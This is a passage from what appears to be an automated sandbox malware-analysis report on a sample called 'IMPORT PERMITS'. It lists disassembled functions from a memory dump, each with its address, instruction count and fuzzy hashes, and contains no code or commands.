                                                                                                                                • Instruction Fuzzy Hash: 11310531A04255AFDB228B6CCC44B9BBFEAEF14354F0841AAF855D7392C774D884CBA4
                                                                                                                                Function 0148E3DB Relevance: .1, Instructions: 105COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: bd241f9a5bcd76b162636eed41218fbdbf4b67884cbddd748e69504ac28a802e
                                                                                                                                • Instruction ID: f9728c99004e6e080973c497f9c5f9e416e79bc53a42701841e2213b8d498c39
                                                                                                                                • Opcode Fuzzy Hash: bd241f9a5bcd76b162636eed41218fbdbf4b67884cbddd748e69504ac28a802e
                                                                                                                                • Instruction Fuzzy Hash: 7831AA31B40716ABD722AF5A9D41F6F7AA8AB58F50F010039F604BB3E1DAB4DC01C7A0
                                                                                                                                Function 01494B4B Relevance: .1, Instructions: 104COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: c57bec9b7ffb1c62d8ff14635e632cb4723d4804ad270882f011d47de13549a7
                                                                                                                                • Instruction ID: 6b355a60675757091eff6615bf39ef192c9241ffd90028163ef23bfa7a5e3f2d
                                                                                                                                • Opcode Fuzzy Hash: c57bec9b7ffb1c62d8ff14635e632cb4723d4804ad270882f011d47de13549a7
                                                                                                                                • Instruction Fuzzy Hash: D2319E326052418FCB21DF1DDA90E26BBF5FB84364F0B446EE9999B361D730E842CB91
                                                                                                                                Function 013E4260 Relevance: .1, Instructions: 102COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 6892c3298af1be6a941d7d9b8732c04f639c691c4fd58fddc18ed095122dfe16
                                                                                                                                • Instruction ID: 9bd32f03c02b04367e7e0b3a4498c93b4f38873bbd8fcc3e0a8dd0a3cb8c6df3
                                                                                                                                • Opcode Fuzzy Hash: 6892c3298af1be6a941d7d9b8732c04f639c691c4fd58fddc18ed095122dfe16
                                                                                                                                • Instruction Fuzzy Hash: BC41AD31200B459FD722CF28C884BD77BE9BB58318F05842EE669CB7A0D774E854CB50
                                                                                                                                Function 01494BB0 Relevance: .1, Instructions: 101COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: b10f34211441d9cb3782cbd469fbab6e05e85af79b98b9884cf18030fcbc7294
                                                                                                                                • Instruction ID: f7fa53dc34671a09bd256584ad34f8f3e0cdae725fc265ddcb7e781cc1ff520c
                                                                                                                                • Opcode Fuzzy Hash: b10f34211441d9cb3782cbd469fbab6e05e85af79b98b9884cf18030fcbc7294
                                                                                                                                • Instruction Fuzzy Hash: DD3170716052418FDB20DF2DDA80A2ABBE5FB84720F0A456EF9599B361D730E806CB51
                                                                                                                                Function 0145EB1D Relevance: .1, Instructions: 100COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 607c61bc33d0ace0c3eba62537d57186bd4dac01138e2f23a187e060e9fb9ba8
                                                                                                                                • Instruction ID: be540ca9065381af4b7f310ce795aee92978038025a4d8ef190c83e7f94de7ab
                                                                                                                                • Opcode Fuzzy Hash: 607c61bc33d0ace0c3eba62537d57186bd4dac01138e2f23a187e060e9fb9ba8
                                                                                                                                • Instruction Fuzzy Hash: 2531A1726016829BF326DB5D8948B26BBD8BB40744F1900A6BF45AB7F3DB38D941C221
                                                                                                                                Function 014A61C3 Relevance: .1, Instructions: 97COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 737438a3018023dc6e1c2816e6fe54798d3821892631cd4104d71b4280f603d4
                                                                                                                                • Instruction ID: 9187b654fb607ac0fc758ac965bd0a82910ea8c7a53cef895cd4e2326de0e9b1
                                                                                                                                • Opcode Fuzzy Hash: 737438a3018023dc6e1c2816e6fe54798d3821892631cd4104d71b4280f603d4
                                                                                                                                • Instruction Fuzzy Hash: 3031F576A00116EBDB15EF98CC40FAEB7B5FB54740F8A416AE900EB254D770ED40CB94
                                                                                                                                Function 0148483A Relevance: .1, Instructions: 96COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: ab200537d7617e6a5eb5bd89014e0751a249dd4dc3a2005ffc3b0cc7555756c7
                                                                                                                                • Instruction ID: b7a87786c59e2f4ec43c974f012caf6788ec5468728666b1b61854d41efc1fe5
                                                                                                                                • Opcode Fuzzy Hash: ab200537d7617e6a5eb5bd89014e0751a249dd4dc3a2005ffc3b0cc7555756c7
                                                                                                                                • Instruction Fuzzy Hash: 3C313576A4112DABCF31EF59DC44BDEBBF5AB98350F1500E5E508A7260DA309E91CF90
                                                                                                                                Function 0140EB20 Relevance: .1, Instructions: 96COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 2a00e5811be1049b7a20b5e70d4c7c7d80d5256468e0f928b397e2ac264ff3b3
                                                                                                                                • Instruction ID: 190d9f6accb0793a37c3fc54abbc95c5948ee49037c32dcd6b8e88b0e3ba159e
                                                                                                                                • Opcode Fuzzy Hash: 2a00e5811be1049b7a20b5e70d4c7c7d80d5256468e0f928b397e2ac264ff3b3
                                                                                                                                • Instruction Fuzzy Hash: 6631A872E00615AFDB22DEAEC840B9FBBF8EF54750F014436E556E72A0D2709A018BA0
                                                                                                                                Function 014A60B8 Relevance: .1, Instructions: 95COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 5bc0306d6ac538e228498bb5e1d7f2d77c8ac33fd1a17dbe377b8e88ca3492ec
                                                                                                                                • Instruction ID: fe22342f2d1df84c2c25bf45bc1fcf4fe7c25f3b174c5664564f1d301b419ff6
                                                                                                                                • Opcode Fuzzy Hash: 5bc0306d6ac538e228498bb5e1d7f2d77c8ac33fd1a17dbe377b8e88ca3492ec
                                                                                                                                • Instruction Fuzzy Hash: 1931D671740606EFDB129F5DC850B6BBBB9AF64754F5A007EE605DB361DA30EC018B90
                                                                                                                                Function 013E07AF Relevance: .1, Instructions: 95COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 5bcaa546458c8dd1460b80b4a03e2b5882092f80c349e0cd995b0319397f172e
                                                                                                                                • Instruction ID: 848f7651693d9f37e34a7ac6b2cddaf83fd5c4fe031c6a9c7129bd058facb0ea
                                                                                                                                • Opcode Fuzzy Hash: 5bcaa546458c8dd1460b80b4a03e2b5882092f80c349e0cd995b0319397f172e
                                                                                                                                • Instruction Fuzzy Hash: 29310332B04726DBCB16DE688884A6FBFE9AFD4258F01452DFD55A7390DA70DC018BE1
                                                                                                                                Function 013E8550 Relevance: .1, Instructions: 94COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: c82c1f51a62135fb1c25c036be1cd0f12337f94b02176d0dbbfcfd79be929f6b
                                                                                                                                • Instruction ID: 25b5485d28ad41b001d8f86b95b04922019ad9954fc2a962eb1db70dd6a0bb4b
                                                                                                                                • Opcode Fuzzy Hash: c82c1f51a62135fb1c25c036be1cd0f12337f94b02176d0dbbfcfd79be929f6b
                                                                                                                                • Instruction Fuzzy Hash: 1A316FB1A053118FE720CF19D844B57BBE5AB98704F0549AEFA84973A1D7B1E844CB91
                                                                                                                                Function 0141A6C7 Relevance: .1, Instructions: 92COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                                                                                                                • Instruction ID: 94166b1db08e1cc7ed766b3a7ed79d9217c023dd64d51d355151c4c600db30c1
                                                                                                                                • Opcode Fuzzy Hash: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                                                                                                                • Instruction Fuzzy Hash: 2A312CB2B01B41AFD761CF69DD40B57BBF8AB08650F14052EA5AAC3761E630E9008B60
                                                                                                                                Function 0148EBD0 Relevance: .1, Instructions: 91COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 889d59317b06ca32c8d1d2424c274345a41632c62eec1739249a898c0a258f52
                                                                                                                                • Instruction ID: 9900a1d43646b4d71e7e461e0eec1afd807d4a96b6896d832c4a98de6e9253ab
                                                                                                                                • Opcode Fuzzy Hash: 889d59317b06ca32c8d1d2424c274345a41632c62eec1739249a898c0a258f52
                                                                                                                                • Instruction Fuzzy Hash: 0731ACB1909302DFCB11EF1EC54095ABBF1FF89218F0589AEE488AB361D331D945CB92
                                                                                                                                Function 0140438F Relevance: .1, Instructions: 89COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 41531a921beaa67d297f2b1fb9d6667fcfb7db35382954b6c96766a4967f5f7a
                                                                                                                                • Instruction ID: 0357840630567a4e8dd9fc558a4047ddc3b27af3325bfb19cf4b10c1cce6424e
                                                                                                                                • Opcode Fuzzy Hash: 41531a921beaa67d297f2b1fb9d6667fcfb7db35382954b6c96766a4967f5f7a
                                                                                                                                • Instruction Fuzzy Hash: D531C431B002469FDB21EFBAC981A6E7BF9EB94304F05853BD609D76A4D730D941CB51
                                                                                                                                Function 013DCB7E Relevance: .1, Instructions: 89COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 8cd4161f5b4d08ac4698b36444b06603346f514182f58bb0feca1d395408faf4
                                                                                                                                • Instruction ID: 34313ba0de828e1bb46687b58293b78d0b49f201850924027b036afb6a2d5107
                                                                                                                                • Opcode Fuzzy Hash: 8cd4161f5b4d08ac4698b36444b06603346f514182f58bb0feca1d395408faf4
                                                                                                                                • Instruction Fuzzy Hash: E9212632E5125BAADB11DBB98801BEFBBB9AF54740F15803AEE55E7350E270D901C7A0
                                                                                                                                Function 013DC156 Relevance: .1, Instructions: 88COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 23d0a7c2eddb499362acc3b6ff52e8901db431d954a157bd048acd9188ebb781
                                                                                                                                • Instruction ID: 020b0de2c612252c8c7d94a096e94456f924eadb2e53bca4ddca05089d112372
                                                                                                                                • Opcode Fuzzy Hash: 23d0a7c2eddb499362acc3b6ff52e8901db431d954a157bd048acd9188ebb781
                                                                                                                                • Instruction Fuzzy Hash: AF3140719002118BDB31AF6CCC45B6A77B4FF94318F94816EDD499B3A2DB34D986CB90
                                                                                                                                Function 0149C3CD Relevance: .1, Instructions: 88COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                                                                                                                • Instruction ID: 6adb0e2cfc4b6e0b01f46780f6e02ac3d89d3646cde4874e7c62113ea53556d2
                                                                                                                                • Opcode Fuzzy Hash: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                                                                                                                • Instruction Fuzzy Hash: 2321FD36700652AADF25AB968C40ABFBFB5EF50710F40842FFA55876B1E634D950C3B0
                                                                                                                                Function 013DE420 Relevance: .1, Instructions: 88COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: fa6f9b2faaf7283ab10db08b6ffdbb5a596aa39eca07e995513ca0962036c929
                                                                                                                                • Instruction ID: 5d33e1e6c6d0deb8cba5decf8a09ee782a8fba94b6bf8ae160f0dff3d9ed23c1
                                                                                                                                • Opcode Fuzzy Hash: fa6f9b2faaf7283ab10db08b6ffdbb5a596aa39eca07e995513ca0962036c929
                                                                                                                                • Instruction Fuzzy Hash: 0531D432A0112D9BDB31DF18EC41FEEBBB9EB15788F4101B5E645AB290D6749E808F90
                                                                                                                                Function 01414588 Relevance: .1, Instructions: 87COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                                                                                                                • Instruction ID: 918dd295dd2b232850c3d2c387f1554c126bc27880f0d3c541fde79487b6f83a
                                                                                                                                • Opcode Fuzzy Hash: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                                                                                                                • Instruction Fuzzy Hash: D221B131A00709EBCB10CF58C980A8EBBB5FF58358F14C46AEE199F254D774EA018B90
                                                                                                                                Function 014144B0 Relevance: .1, Instructions: 87COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: cfd035d93236c4eb7769354e3f5f73496de116391bf7e377029a9692b0f8dbba
                                                                                                                                • Instruction ID: be7e2d153ccfdfe2e30faefb0a7b18514ad53e1f6758ca6bcb4bfa8e910151c3
                                                                                                                                • Opcode Fuzzy Hash: cfd035d93236c4eb7769354e3f5f73496de116391bf7e377029a9692b0f8dbba
                                                                                                                                • Instruction Fuzzy Hash: CA21C3726047469BCB22CF19C840B6B77E4FB88760F05452EFE549B655D730E901CBA2
                                                                                                                                Function 013DE388 Relevance: .1, Instructions: 86COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                                                                                                                • Instruction ID: e55aa39c8b7ec6469f13f3e146d91465c8c1b828e434c1c11c41292be7a1dd47
                                                                                                                                • Opcode Fuzzy Hash: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                                                                                                                • Instruction Fuzzy Hash: EA319C32600605EFD721CF69D884F6ABBB9FF85358F1045A9E512DB690E770EE02CB50
                                                                                                                                Function 0145E609 Relevance: .1, Instructions: 86COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 5a3269dba6911b54a0aeb4b6319faecde05636a4ef2118f6ce66802f1842ef16
                                                                                                                                • Instruction ID: 6ae89eda2f1bc06e302fe9970ddfb4e0b3735f432febd90f841e8edd6086c6e4
                                                                                                                                • Opcode Fuzzy Hash: 5a3269dba6911b54a0aeb4b6319faecde05636a4ef2118f6ce66802f1842ef16
                                                                                                                                • Instruction Fuzzy Hash: 70319175600205EFCB54CF1CC4849AEB7B5FF84344B55445AEC0DAB3A2EB31EA51CBA0
                                                                                                                                Function 0146019F Relevance: .1, Instructions: 78COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 880d9c197f96c51492cac187335dc65b79839186dd9ebcd70ac21569996e648f
                                                                                                                                • Instruction ID: 259b9b6e015c54ad7033ed4940ea71738d97488769e33e51b103a1a14bfb6247
                                                                                                                                • Opcode Fuzzy Hash: 880d9c197f96c51492cac187335dc65b79839186dd9ebcd70ac21569996e648f
                                                                                                                                • Instruction Fuzzy Hash: E5218971600645ABDB15DB6DD840F6AB7B8FF58744F14006AFA04DB7A0D638ED40CBA8
                                                                                                                                Function 01460283 Relevance: .1, Instructions: 74COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: b20566ad1290cbcafe472a02800154e25f6e7e23f44986e2716b4e48b31d047b
                                                                                                                                • Instruction ID: 28f7c0105a7dc4a486ebd086bd2b3040b7a3e0ba70e59a7f88aa4ea2ccea5f52
                                                                                                                                • Opcode Fuzzy Hash: b20566ad1290cbcafe472a02800154e25f6e7e23f44986e2716b4e48b31d047b
                                                                                                                                • Instruction Fuzzy Hash: F721B3725043469BD712DF5EC944B5BBBDCEFA0248F08046BBE80C7261D734D945C6A2
                                                                                                                                Function 01402835 Relevance: .1, Instructions: 73COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: d21cbdc1183e01b4e177c4e0c9b0eae89461556293a9ffecb6562186c20b9847
                                                                                                                                • Instruction ID: 710d1e3c6ff7f459dc5632033a83ab7ca7ddd357184248d9d63365138e10cb99
                                                                                                                                • Opcode Fuzzy Hash: d21cbdc1183e01b4e177c4e0c9b0eae89461556293a9ffecb6562186c20b9847
                                                                                                                                • Instruction Fuzzy Hash: 92210E726456819BF323576D8C08F153B95AF41774F2803B6FA619B7F2D7B8D902C141
                                                                                                                                Function 0141A30B Relevance: .1, Instructions: 70COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: a1a7fab3a18f703708da895ef725866b56b6eb0e54e9d0ed6665e610215c4d8b
                                                                                                                                • Instruction ID: dcef8c152c60d8cf69353b1e25e0709b942269279ccef64b15950775258dea2b
                                                                                                                                • Opcode Fuzzy Hash: a1a7fab3a18f703708da895ef725866b56b6eb0e54e9d0ed6665e610215c4d8b
                                                                                                                                • Instruction Fuzzy Hash: 6F21AC352416419FCB25DF29C801B46B7F5BF08708F24846DA509CBB62E331E842CF98
                                                                                                                                Function 0149A49A Relevance: .1, Instructions: 70COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: ddf70da1fffc696d37cc15ec91b41063624087369af3ccab254489aff56437b4
                                                                                                                                • Instruction ID: c7c8e4fc2392367f111455980d29f7e1a20990a6cb4d4cc1e328cc61168cbde5
                                                                                                                                • Opcode Fuzzy Hash: ddf70da1fffc696d37cc15ec91b41063624087369af3ccab254489aff56437b4
                                                                                                                                • Instruction Fuzzy Hash: 9A11E372380A11FBEB2256599C41F677E99DBD4B70F71012AB718DB2A0EFB0DC018795
                                                                                                                                Function 014780A8 Relevance: .1, Instructions: 69COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                                                                                                                                • Instruction ID: b2cf303ff3b9c50ca2ca766240d1e38f56632d3456ef7254016d7b7260373910
                                                                                                                                • Opcode Fuzzy Hash: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                                                                                                                                • Instruction Fuzzy Hash: 7B218E72A0020AEFDF129F98CC44BEEBBB9EF58310F21481AF954A7261D734D951CB50
                                                                                                                                Function 01410124 Relevance: .1, Instructions: 68COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
